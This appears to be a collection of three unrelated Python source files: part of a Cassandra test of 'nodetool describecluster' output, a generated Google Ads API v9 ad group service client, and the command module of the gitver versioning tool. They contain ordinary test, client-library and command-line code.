session_dc3.execute("create KEYSPACE ks2 WITH replication = {'class': 'NetworkTopologyStrategy', 'dc1': 3, 'dc2':5, 'dc3':1}")
all_nodes = cluster.nodelist()
out_node1_dc1, node1_dc1_sorted = self._describe(all_nodes.pop())
for node in all_nodes:
out, out_sorted = self._describe(node)
assert node1_dc1_sorted == out_sorted
logger.debug(out_node1_dc1)
assert 'Live: 4' in out_node1_dc1
assert 'Joining: 0' in out_node1_dc1
assert 'Moving: 0' in out_node1_dc1
assert 'Leaving: 0' in out_node1_dc1
assert 'Unreachable: 0' in out_node1_dc1
assert 'Data Centers:' in out_node1_dc1
assert 'dc1 #Nodes: 1 #Down: 0' in out_node1_dc1
assert 'dc2 #Nodes: 2 #Down: 0' in out_node1_dc1
assert 'dc3 #Nodes: 1 #Down: 0' in out_node1_dc1
assert 'Keyspaces:' in out_node1_dc1
expected_keyspaces = [('system_schema', 'LocalStrategy', {''}),
('system', 'LocalStrategy', {''}),
('system_traces', 'SimpleStrategy', {'replication_factor=2'}),
('system_distributed', 'SimpleStrategy', {'replication_factor=3'}),
('system_auth', 'SimpleStrategy', {'replication_factor=1'}),
('ks1', 'NetworkTopologyStrategy', {'dc1=3','dc2=5','dc3=1'}),
('ks2', 'NetworkTopologyStrategy', {'dc1=3','dc2=5','dc3=1'})]
for (ks, strategy, _) in expected_keyspaces:
assert "{} -> Replication class: {}".format(ks, strategy) in out_node1_dc1 # replication factor is verified below
# now check db versions & replication factor:
# Database versions:
# 4.0.0: [127.0.0.6:7000, 127.0.0.5:7000, 127.0.0.4:7000, 127.0.0.3:7000, 127.0.0.2:7000, 127.0.0.1:7000]
lines = out_node1_dc1.splitlines()
rex = r'(\S+)\s\[(.*)\]'
found_keyspaces = False
found_database = False
verified_rfs = 0
for i in range(0, len(lines)):
if 'Keyspaces' in lines[i]:
found_keyspaces = True
for x in range(i+1, len(lines)):
for (ks, strategy, replication) in expected_keyspaces:
if "{} ->".format(ks) in lines[x]:
verified_rfs += 1
assert strategy in lines[x]
assert replication == self._get_replication(lines[x])
if 'Database versions:' in lines[i]:
found_database = True
m = re.search(rex, lines[i+1])
# group(1) is the version, and all nodes are on the same version
assert "{}".format(node1_dc1.get_cassandra_version()) in m.group(1)
nodestring = m.group(2)
for n in cluster.nodelist():
assert n.address_and_port() in nodestring
assert found_keyspaces
assert found_database
assert verified_rfs == len(expected_keyspaces)
def _get_replication(self, line):
# ks1 -> Replication class: NetworkTopologyStrategy {dc2=5, dc1=3, dc3=1}
repl_rex = r'{(.*)}'
repl_m = re.search(repl_rex, line)
return {x.strip() for x in repl_m.group(1).split(",")}
def _describe(self, node):
node_describe, err, _ = node.nodetool('describecluster')
assert 0 == len(err), err
out_sorted = node_describe.split()
out_sorted.sort()
return (node_describe, out_sorted)
| |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import os
import re
from typing import Dict, Optional, Sequence, Tuple, Type, Union
from google.api_core import client_options as client_options_lib
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.ads.googleads.v9.resources.types import ad_group
from google.ads.googleads.v9.services.types import ad_group_service
from google.rpc import status_pb2 # type: ignore
from .transports.base import AdGroupServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import AdGroupServiceGrpcTransport
class AdGroupServiceClientMeta(type):
"""Metaclass for the AdGroupService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[AdGroupServiceTransport]]
_transport_registry["grpc"] = AdGroupServiceGrpcTransport
def get_transport_class(
cls, label: str = None,
) -> Type[AdGroupServiceTransport]:
"""Return an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class AdGroupServiceClient(metaclass=AdGroupServiceClientMeta):
"""Service to manage ad groups."""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Convert api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "googleads.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
AdGroupServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(
info
)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
AdGroupServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(
filename
)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> AdGroupServiceTransport:
"""Return the transport used by the client instance.
Returns:
AdGroupServiceTransport: The transport used by the client instance.
"""
return self._transport
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
"""Releases underlying transport's resources.
.. warning::
ONLY use as a context manager if the transport is NOT shared
with other clients! Exiting the with block will CLOSE the transport
and may cause errors in other clients!
"""
self.transport.close()
@staticmethod
def ad_group_path(customer_id: str, ad_group_id: str,) -> str:
"""Return a fully-qualified ad_group string."""
return "customers/{customer_id}/adGroups/{ad_group_id}".format(
customer_id=customer_id, ad_group_id=ad_group_id,
)
@staticmethod
def parse_ad_group_path(path: str) -> Dict[str, str]:
"""Parse a ad_group path into its component segments."""
m = re.match(
r"^customers/(?P<customer_id>.+?)/adGroups/(?P<ad_group_id>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def ad_group_label_path(
customer_id: str, ad_group_id: str, label_id: str,
) -> str:
"""Return a fully-qualified ad_group_label string."""
return "customers/{customer_id}/adGroupLabels/{ad_group_id}~{label_id}".format(
customer_id=customer_id, ad_group_id=ad_group_id, label_id=label_id,
)
@staticmethod
def parse_ad_group_label_path(path: str) -> Dict[str, str]:
"""Parse a ad_group_label path into its component segments."""
m = re.match(
r"^customers/(?P<customer_id>.+?)/adGroupLabels/(?P<ad_group_id>.+?)~(?P<label_id>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def campaign_path(customer_id: str, campaign_id: str,) -> str:
"""Return a fully-qualified campaign string."""
return "customers/{customer_id}/campaigns/{campaign_id}".format(
customer_id=customer_id, campaign_id=campaign_id,
)
@staticmethod
def parse_campaign_path(path: str) -> Dict[str, str]:
"""Parse a campaign path into its component segments."""
m = re.match(
r"^customers/(?P<customer_id>.+?)/campaigns/(?P<campaign_id>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Return a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Return a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Return a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Return a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Return a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path
)
return m.groupdict() if m else {}
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, AdGroupServiceTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the ad group service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.AdGroupServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
if os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false") not in (
"true",
"false",
):
raise ValueError(
"Environment variable `GOOGLE_API_USE_CLIENT_CERTIFICATE` must be either `true` or `false`"
)
use_client_cert = (
os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false") == "true"
)
ssl_credentials = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
import grpc # type: ignore
cert, key = client_options.client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
is_mtls = True
else:
creds = SslCredentials()
is_mtls = creds.is_mtls
ssl_credentials = creds.ssl_credentials if is_mtls else None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
api_endpoint = (
self.DEFAULT_MTLS_ENDPOINT
if is_mtls
else self.DEFAULT_ENDPOINT
)
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, AdGroupServiceTransport):
# transport is a AdGroupServiceTransport instance.
if credentials:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
self._transport = transport
elif isinstance(transport, str):
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials, host=self.DEFAULT_ENDPOINT
)
else:
self._transport = AdGroupServiceGrpcTransport(
credentials=credentials,
host=api_endpoint,
ssl_channel_credentials=ssl_credentials,
client_info=client_info,
)
def get_ad_group(
self,
request: Union[ad_group_service.GetAdGroupRequest, dict] = None,
*,
resource_name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> ad_group.AdGroup:
r"""Returns the requested ad group in full detail.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `HeaderError <>`__
`InternalError <>`__ `QuotaError <>`__ `RequestError <>`__
Args:
request (Union[google.ads.googleads.v9.services.types.GetAdGroupRequest, dict]):
The request object. Request message for
[AdGroupService.GetAdGroup][google.ads.googleads.v9.services.AdGroupService.GetAdGroup].
resource_name (:class:`str`):
Required. The resource name of the ad
group to fetch.
This corresponds to the ``resource_name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.ads.googleads.v9.resources.types.AdGroup:
An ad group.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
if request is not None and any([resource_name]):
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a ad_group_service.GetAdGroupRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, ad_group_service.GetAdGroupRequest):
request = ad_group_service.GetAdGroupRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if resource_name is not None:
request.resource_name = resource_name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_ad_group]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("resource_name", request.resource_name),)
),
)
# Send the request.
response = rpc(
request, retry=retry, timeout=timeout, metadata=metadata,
)
# Done; return the response.
return response
def mutate_ad_groups(
self,
request: Union[ad_group_service.MutateAdGroupsRequest, dict] = None,
*,
customer_id: str = None,
operations: Sequence[ad_group_service.AdGroupOperation] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> ad_group_service.MutateAdGroupsResponse:
r"""Creates, updates, or removes ad groups. Operation statuses are
returned.
List of thrown errors: `AdGroupError <>`__ `AdxError <>`__
`AuthenticationError <>`__ `AuthorizationError <>`__
`BiddingError <>`__ `BiddingStrategyError <>`__
`DatabaseError <>`__ `DateError <>`__ `DistinctError <>`__
`FieldError <>`__ `FieldMaskError <>`__ `HeaderError <>`__
`IdError <>`__ `InternalError <>`__ `ListOperationError <>`__
`MultiplierError <>`__ `MutateError <>`__
`NewResourceCreationError <>`__ `NotEmptyError <>`__
`NullError <>`__ `OperationAccessDeniedError <>`__
`OperatorError <>`__ `QuotaError <>`__ `RangeError <>`__
`RequestError <>`__ `ResourceCountLimitExceededError <>`__
`SettingError <>`__ `SizeLimitError <>`__
`StringFormatError <>`__ `StringLengthError <>`__
`UrlFieldError <>`__
Args:
request (Union[google.ads.googleads.v9.services.types.MutateAdGroupsRequest, dict]):
The request object. Request message for
[AdGroupService.MutateAdGroups][google.ads.googleads.v9.services.AdGroupService.MutateAdGroups].
customer_id (:class:`str`):
Required. The ID of the customer
whose ad groups are being modified.
This corresponds to the ``customer_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
operations (:class:`Sequence[google.ads.googleads.v9.services.types.AdGroupOperation]`):
Required. The list of operations to
perform on individual ad groups.
This corresponds to the ``operations`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.ads.googleads.v9.services.types.MutateAdGroupsResponse:
Response message for an ad group
mutate.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
if request is not None and any([customer_id, operations]):
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a ad_group_service.MutateAdGroupsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, ad_group_service.MutateAdGroupsRequest):
request = ad_group_service.MutateAdGroupsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if customer_id is not None:
request.customer_id = customer_id
if operations is not None:
request.operations = operations
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.mutate_ad_groups]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("customer_id", request.customer_id),)
),
)
# Send the request.
response = rpc(
request, retry=retry, timeout=timeout, metadata=metadata,
)
# Done; return the response.
return response
__all__ = ("AdGroupServiceClient",)
| |
#!/usr/bin/env python2
# coding=utf-8
"""
Defines gitver commands
"""
import re
import os
import sys
from string import Template
from termcolors import term, bold
from git import get_repo_info
from gitver.storage import KVStore
from sanity import check_gitignore
from defines import CFGDIR, PRJ_ROOT, CFGDIRNAME
from version import gitver_version, gitver_buildid
# file where to store NEXT strings <=> TAG user-defined mappings
NEXT_STORE_FILE = os.path.join(CFGDIR, ".next_store")
TPLDIR = os.path.join(CFGDIR, 'templates')
user_version_matcher = r"v{0,1}(?P<maj>\d+)\.(?P<min>\d+)\.(?P<patch>\d+)" \
r"(?:\.(?P<revision>\d+))?$"
#
# helpers
#
def template_path(name):
"""
Constructs and returns the absolute path for the specified template file
name.
"""
return os.path.join(TPLDIR, name)
def parse_templates(cfg, templates, repo, next_custom, preview):
"""
Parse one or more templates, substitute placeholder variables with
real values and write the result to the file specified in the template.
If preview is True, then the output will be written to the stdout while
informative messages will be output to the stderr.
"""
for t in templates.split(' '):
tpath = template_path(t)
if os.path.exists(tpath):
with open(tpath, 'r') as fp:
lines = fp.readlines()
if len(lines) < 2:
term.err("The template \"" + t + "\" is not valid, aborting.")
return
if not lines[0].startswith('#'):
term.err("The template \"" + t + "\" doesn't define any valid "
"output, aborting.")
return
output = str(lines[0]).strip(' #\n')
# resolve relative paths to the project's root
if not os.path.isabs(output):
output = os.path.join(PRJ_ROOT, output)
outdir = os.path.dirname(output)
if not os.path.exists(outdir):
term.err("The template output directory \"" + outdir +
"\" doesn't exists.")
term.info("Processing template \"" + bold(t) + "\" for " + output +
"...")
lines = lines[1:]
xformed = Template("".join(lines))
vstring = build_version_string(cfg, repo, False, next_custom)
args = build_format_args(cfg, repo, next_custom)
keywords = {
'CURRENT_VERSION': vstring,
'MAJOR': args['maj'],
'MINOR': args['min'],
'PATCH': args['patch'],
'REV': args['rev'],
'REV_PREFIX': args['rev_prefix'],
'BUILD_ID': args['build_id'],
'FULL_BUILD_ID': args['build_id_full'],
'COMMIT_COUNT': args['commit_count'],
'COMMIT_COUNT_STR':
str(args['commit_count']) if args['commit_count'] > 0 else '',
'COMMIT_COUNT_PREFIX': args['commit_count_prefix'],
'META_PR': args['meta_pr'],
'META_PR_PREFIX': args['meta_pr_prefix']
}
try:
res = xformed.substitute(keywords)
except KeyError as e:
term.err("Unknown key \"" + e.message + "\" found, aborting.")
sys.exit(1)
if not preview:
try:
fp = open(output, 'w')
fp.write(res)
fp.close()
except IOError:
term.err("Couldn't write file \"" + output + "\"")
sys.exit(1)
else:
term.out(res)
wrote_bytes = len(res) if preview else os.stat(output).st_size
term.info("Done, " + str(wrote_bytes) + " bytes written.")
else:
term.err("Couldn't find the \"" + t + "\" template")
sys.exit(1)
def parse_user_next_stable(user):
"""
Parse the specified user-defined string containing the next stable version
numbers and returns the discretized matches in a dictionary.
"""
try:
data = re.match(user_version_matcher, user).groupdict()
if len(data) < 3:
raise AttributeError
except AttributeError:
return False
return data
def build_format_args(cfg, repo_info, next_custom=None):
"""
Builds the formatting arguments by processing the specified repository
information and returns them.
If a tag defines pre-release metadata, this will have the precedence
over any existing user-defined string.
"""
in_next = repo_info['count'] > 0
has_next_custom = next_custom is not None and len(next_custom) > 0
vmaj = repo_info['maj']
vmin = repo_info['min']
vpatch = repo_info['patch']
vrev = repo_info['rev']
vcount = repo_info['count']
vpr = repo_info['pr']
vbuildid = repo_info['build-id']
has_pr = vpr is not None
has_rev = vrev is not None
# pre-release metadata in a tag has precedence over user-specified
# NEXT strings
if in_next and has_next_custom and not has_pr:
u = parse_user_next_stable(next_custom)
if not u:
term.err("Invalid custom NEXT version numbers detected!")
sys.exit(1)
vmaj = u['maj']
vmin = u['min']
vpatch = u['patch']
vrev = u['revision']
has_rev = vrev is not None
meta_pr = vpr if has_pr else \
cfg['default_meta_pr_in_next'] if in_next and has_next_custom else \
cfg['default_meta_pr_in_next_no_next'] if in_next else ''
args = {
'maj': vmaj,
'min': vmin,
'patch': vpatch,
'rev': vrev if has_rev else '',
'rev_prefix': '.' if has_rev else '',
'meta_pr': meta_pr,
'meta_pr_prefix': cfg['meta_pr_prefix'] if len(meta_pr) > 0 else '',
'commit_count': vcount if vcount > 0 else '',
'commit_count_prefix': cfg['commit_count_prefix'] if vcount > 0 else '',
'build_id': vbuildid,
'build_id_full': repo_info['full-build-id']
}
return args
def build_version_string(cfg, repo, promote=False, next_custom=None):
"""
Builds the final version string by processing the specified repository
information, optionally handling version promotion.
Version promotion will just return the user-specified next version string,
if any is present, else an empty string will be returned.
"""
in_next = repo['count'] > 0
has_next_custom = next_custom is not None and len(next_custom) > 0
if promote:
if has_next_custom:
# simulates next real version after proper tagging
version = next_custom
return version
else:
return ''
fmt = cfg['format'] if not in_next else cfg['format_next']
return fmt % build_format_args(cfg, repo, next_custom)
#
# commands
#
def cmd_version(cfg, args):
"""
Generates gitver's version string and license information and prints it
to the stdout.
"""
v = ('v' + gitver_version) if gitver_version is not None else 'n/a'
b = gitver_buildid if gitver_buildid is not None else 'n/a'
term.out("This is gitver " + bold(v))
term.out("Full build ID is " + bold(b))
from gitver import __license__
term.out(__license__)
def cmd_init(cfg, args):
"""
Initializes the current repository by creating the gitver's configuration
directory and creating the default configuration file, if none is present.
Multiple executions of this command will regenerate the default
configuration file whenever it's not found.
"""
from config import create_default_configuration_file
i = 0
if not os.path.exists(CFGDIR):
i += 1
os.makedirs(CFGDIR)
if not os.path.exists(TPLDIR):
i += 1
os.makedirs(TPLDIR)
# try create the default configuration file
wrote_cfg = create_default_configuration_file()
if wrote_cfg:
term.out("gitver has been initialized and configured.")
else:
term.warn("gitver couldn't create the default configuration file, "
"does it already exist?")
def cmd_current(cfg, args):
"""
Generates the current version string, depending on the state of the
repository and prints it to the stdout.
"""
next_store = KVStore(NEXT_STORE_FILE)
repo_info = get_repo_info()
last_tag = repo_info['last-tag']
has_next_custom = next_store.has(last_tag)
next_custom = next_store.get(last_tag) if has_next_custom else None
term.out(build_version_string(cfg, repo_info, False, next_custom))
def cmd_info(cfg, args):
"""
Generates version string and repository information and prints it to the
stdout.
"""
next_store = KVStore(NEXT_STORE_FILE)
repo_info = get_repo_info()
last_tag = repo_info['last-tag']
has_next_custom = next_store.has(last_tag)
next_custom = next_store.get(last_tag) if has_next_custom else None
if has_next_custom:
nvn = term.next(next_custom)
else:
nvn = "none, defaulting to " + \
term.next("-" + cfg['default_meta_pr_in_next_no_next']) + \
" suffix"
term.out("Most recent tag: " + term.tag(last_tag))
if repo_info['pr'] is None and repo_info['count'] > 0:
term.out("Using NEXT defined as: " + nvn)
term.out("(Pre-release metadata: none)")
elif repo_info['pr'] is not None:
term.out("(NEXT defined as: " + nvn + ")")
term.out("Using pre-release metadata: " +
term.tag(str(repo_info['pr'])))
term.out("Current build ID: " + term.tag(repo_info['full-build-id']))
promoted = build_version_string(cfg, repo_info, True, next_custom)
term.out(
"Current version: " + "v" +
term.ver(build_version_string(
cfg, repo_info, False, next_custom)) +
(" => v" + term.prom(promoted) if len(promoted) > 0 else '')
)
def cmd_list_templates(cfg, args):
"""
Generates a list of available templates by inspecting the gitver's template
directory and prints it to the stdout.
"""
tpls = [f for f in os.listdir(TPLDIR) if os.path.isfile(template_path(f))]
if len(tpls) > 0:
term.out("Available templates:")
for t in tpls:
term.out(" " + bold(t) + " (" + template_path(t) + ")")
else:
term.out("No templates available in " + TPLDIR)
def __cmd_build_template(cfg, args, preview=False):
"""
Internal-only function used for avoiding code duplication between
template-operating functions.
See cmd_build_template and cmd_preview_template for the full docs.
"""
next_store = KVStore(NEXT_STORE_FILE)
repo_info = get_repo_info()
last_tag = repo_info['last-tag']
has_next_custom = next_store.has(last_tag)
next_custom = next_store.get(last_tag) if has_next_custom else None
parse_templates(cfg, args.templates, repo_info, next_custom, preview)
def cmd_build_template(cfg, args):
"""
Performs placeholder variables substitution on the templates specified by
the @param args parameter and write the result to each respective output
file specified by the template itself.
"""
__cmd_build_template(cfg, args)
def cmd_preview_template(cfg, args):
"""
Performs placeholder variables substitution on the templates specified by
the @param args parameter and prints the result to the stdout.
"""
__cmd_build_template(cfg, args, True)
def cmd_next(cfg, args):
"""
Sets and defines the next stable version string for the most recent and
reachable tag.
The string should be supplied in the format "maj.min.patch[.revision]",
where angular brackets denotes an optional value.
All values are expected to be decimal numbers without leading zeros.
"""
next_store = KVStore(NEXT_STORE_FILE)
repo_info = get_repo_info()
last_tag = repo_info['last-tag']
vn = args.next_version_numbers
user = parse_user_next_stable(vn)
if not user:
term.err("Please specify valid version numbers.\nThe expected "
"format is <MAJ>.<MIN>.<PATCH>[.<REVISION>], e.g. v0.0.1, "
"0.0.1 or 0.0.2.1")
sys.exit(1)
custom = "%d.%d.%d" % (int(user['maj']), int(user['min']), int(user['patch']))
if user['revision'] is not None:
custom += ".%d" % (int(user['revision']))
next_store.set(last_tag, custom).save()
term.out("Set NEXT version string to " + term.next(custom) +
" for the current tag " + term.tag(last_tag))
def cmd_clean(cfg, args):
"""
Removes the user-defined next stable version for the most recent and
reachable tag or for the tag specified by the @param args parameter.
"""
next_store = KVStore(NEXT_STORE_FILE)
if len(args.tag) > 0:
tag = args.tag
else:
repo_info = get_repo_info()
tag = repo_info['last-tag']
has_custom = next_store.has(tag)
next_custom = next_store.get(tag) if has_custom else None
if has_custom:
next_store.rm(tag).save()
term.out("Cleaned up custom string version \"" + next_custom +
"\" for tag \"" + tag + "\"")
else:
term.out("No custom string version found for tag \"" + tag + "\"")
def cmd_cleanall(cfg, args):
"""
Removes ALL user-defined next stable versions.
"""
if os.path.exists(NEXT_STORE_FILE):
os.unlink(NEXT_STORE_FILE)
term.out("All previously set custom strings have been removed.")
else:
term.out("No NEXT custom strings found.")
def cmd_list_next(cfg, args):
"""
Generates a list of all user-defined next stable versions and prints them
to the stdout.
"""
next_store = KVStore(NEXT_STORE_FILE)
repo_info = get_repo_info()
last_tag = repo_info['last-tag']
has_next_custom = next_store.has(last_tag)
if not next_store.empty():
def print_item(k, v):
term.out(" %s => %s" % (term.tag(k), term.next(v)) +
(' (*)' if k == last_tag else ''))
term.out("Currently set NEXT custom strings (*=most recent and "
"reachable tag):")
for tag, vstring in sorted(next_store.items()):
print_item(tag, vstring)
if not has_next_custom:
print_item(last_tag, '<undefined>')
else:
term.out("No NEXT custom strings set.")
def cmd_check_gitignore(cfg, args):
"""
Provides a way to ensure that at least one line in the .gitignore file for
the current repository defines the '.gitver' directory in some way.
This means that even a definition such as "!.gitver" will pass the check,
but this imply some reasoning has been made before declaring something like
this.
"""
if check_gitignore():
term.out("Your .gitignore file looks fine.")
else:
term.out("Your .gitignore file doesn't define any rule for the " +
CFGDIRNAME + "\nconfiguration directory: it's recommended to "
"exclude it from\nthe repository, unless you know what you "
"are doing. If you are not\nsure, add this line to your "
".gitignore file:\n\n " + CFGDIRNAME + "\n")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.